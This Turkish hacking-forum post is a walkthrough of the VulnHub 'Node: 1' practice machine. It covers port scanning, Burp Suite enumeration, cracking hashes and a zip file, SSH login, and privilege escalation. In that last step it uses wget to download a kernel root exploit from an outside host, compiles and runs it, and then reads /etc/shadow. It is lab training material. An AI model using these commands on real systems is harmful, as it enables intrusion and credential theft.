Node 1 Açıklı Makine Çözümü / ch_arli41

ch_arli41

Özel Üye
9 Tem 2009
1,036
18
Merhaba arkadaşlar.
Bu konumda sizlere Node:1 orta seviye açıklı makine’nin çözümünü anlatacam.Başlamadan kısa bilgi vereyim.Açık bulunan sistem user ve root flags(bayraklarını) bulmamızı istiyorlar.Ben burda sistemin şifrelerini almayı, şifrelerin kırma yöntemlerini ve sistemde root yetkisine ulaşmayı gösterecem.Sizlerden isteğim root flag(bayrağını) bulmanız.Bulduğunuz bayrağı bana iletirseniz konuya ekliyecem.


Node:1 Makinesini Aşağıdaki Linkten İndirebilirsiniz:


https://www.vulnhub.com/entry/node-1,252/#


Sistem kurulumunu ve ayarları yapmak için burdaki konuyu inceleye bilirsiniz.


https://www.turkhackteam.org/siber-...ulnupload-acikli-makine-cozumu-ch_arli41.html




Al9FYn.png

nX39IT.png



Kod:
netdiscover


Bu komut bize modeme bağlı cihazları listeliyor.Ordan ip’yi kopyalıyoruz.



m3xCD7.png

7i46Zl.png



Kod:
nmap ipadresi


Bu komut ile portlara bakıyoruz.22 ve 3000 portunu gösteriyor bize 3000 portunu ipadres port numarası olarak tarayıcıma yazıyorum.



ysyGJd.png

M8Bu6E.png



Evet karşıma web sayfası geldi.LOGIN kısmına tıklıyorum ve karşıma giriş sayfası çıktı.Şimdiki hedefim giriş bilgilerini bulmak.Bunu için Burp Suite programını kullanacam.



fAzPxt.png

uCYfU7.png



Firefox tarayıcımızın ayarlarını yapıyoruz.Advanced kısmına geliyoruz ve Network'a tıklıyoruz.HTTP kısmına 127.0.0.1 port kısmına 8080 yazıyoruz resimdeki gibi.


bO6eZi.png



Tarayıcıda sayfayı yenile yaptığımızda burp suit proğramımıza geldi.Forward kısmına 2 yada 3 sefer tıklıyoruz.Target bölümüne geçiyoruz.



2V0TEg.png




Burdaki linke sağ tıklıyoruz ve Spider this host'a tıklıyoruz.Bu şekilde brup suit proğramı tarama yapıp bütün detayları bize verecektir.





O3srac.png



Resimde gördüğünüz gibi /api/users/ yoluna gidiyorum ve java script link yolunu kopyalıyorum.





u2rZT5.png




Giriş bilgilerine ulaştık.Bilgiler şifrelendiği içi kırmamız gerekecek ilk önce şifreleme türünü bulalım.




O4FFn0.png

IXDizh.png

72iTDV.png


hash-identifier

Şifreleme türünü öğrenmek için hash-identifier scriptini kullanıyoruz.Sha-256 ile şifrelendiğini öğrendik devam ediyoruz.



SpqJqp.png

ecgwxV.png



Kod:
john --show --format=raw-sha256 /sifreler.txt


Ben burda John the rippe şifre kırma yazılımını kullandım siz isterseniz diğer şifre kırma araçlarını kullana bilirsiniz.Burda sifreler.txt dosyasının içine kırılacak sifreleri yazıyoruz ve john the rippe programı kendi içindeki wordlist'den yararlanarak şifreleri kırıyor.






TwO0wn.png

zf5xbx.png

hHECJh.png


Admin panelimize giriş yapıyoruz ve backup dosyası denk geliyor anlaşılan bu iş uzuyacak gibi ama bıkmadan yolumuza devam ediyoruz.Backup dosyasını indiriyoruz.Dosyayı incelememizin sonucunda base64 ile encrypt edildiğini öğrendik.Bu dosyayı decrypt etmemiz gerekiyor.

gZYvV2.png

z2ugFO.png

U23gt0.png



Kod:
cat myplace.backup | base64 -d > ch_arli41

Yukardaki komut ile backup dosyasını decrypt ediyoruz ve karşımıza zip dosyası çıkıyor.Zip dosyasının içindekileri çıkarmak istediğimizde bizden şifre istiyor.



Jsn7ER.png




Zip dosyasını kırmak için fcrackzip yazılımını kullanacaz.Konsola fcrackzip yazıp komutların detayına baka bilirsiniz.




QJUgoQ.png



Kod:
fcrackzip -u -D -p wordlist.txt ch_arli41



Bu komut ile zip dosyamızın şifresini kırıyoruz.Burda dikkat edilmesi gereken nokta eğer wordlist'in içinde doğru şifre yoksa kırılmaz bunun için başka wordlist denememiz gereke bilir.




3GVcPv.png




Zip dosyasından dosyaları çıkarttık./var/www/myplace dosya yoluna gidiyoruz apps.js dosyasını not defteri yada metin düzenleyiciyle açıyoruz.Ssh giriş bilgilerini aldık sisteme bağlana biliriz.




YqCvrD.png

8HO1YI.png

8zaOun.png



Kod:
ssh mark@ipadresi

Bu komut ile sisteme bağlandık.Şimdik sistemi inceliyelim biraz.



a4NjI0.png



Resimdeki gibi sistemin bilgilerini aldım.cat /etc/shadow komutunu yazdığımda yetkimin olmadığını gördüm.Sistemde root yetkisine kendimi yükseltmem gerekecek bunun için 4.4.0 linux local root exploiti'ni aratıyorum googleden ve searchsploit kullanarak.



GTjM1q.png


Kod:
cd /tmp

Kod:
wget http://cyseclabs.com/pub/upstream44.c

cd komutu ile dizin değiştiriyorum.wget komutunu kullanarak c dilinde yazılmış exploiti bulunduğum dizine indiriyorum.



uGcz1w.png

fQ30r9.png



gcc dosya-adi.c -o ch_arli41


Bu komut ile c dilinde yazılmış exploiti derliyorum.



dyOpg0.png



Kod:
./ch_arli41


Yukardaki komut ile exploiti çalıştırıyoruz.Siz orda hangi ismi verdiyseniz o isimi yazacaksınız.



MnfP1I.png



Kod:
cd ..
cat /etc/shadow


Resimde gördüğüz gibi cd komutu ile ana dizine geçiş yaptık cat komutunu kullanarak bilgileri ekrana yansıttık.



Benim anlatımım buraya kadar konunun başında dediğim gibi root bilgisini sizlerden bekliyorum.
Bir sonraki konuda görüşmek üzere..​
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.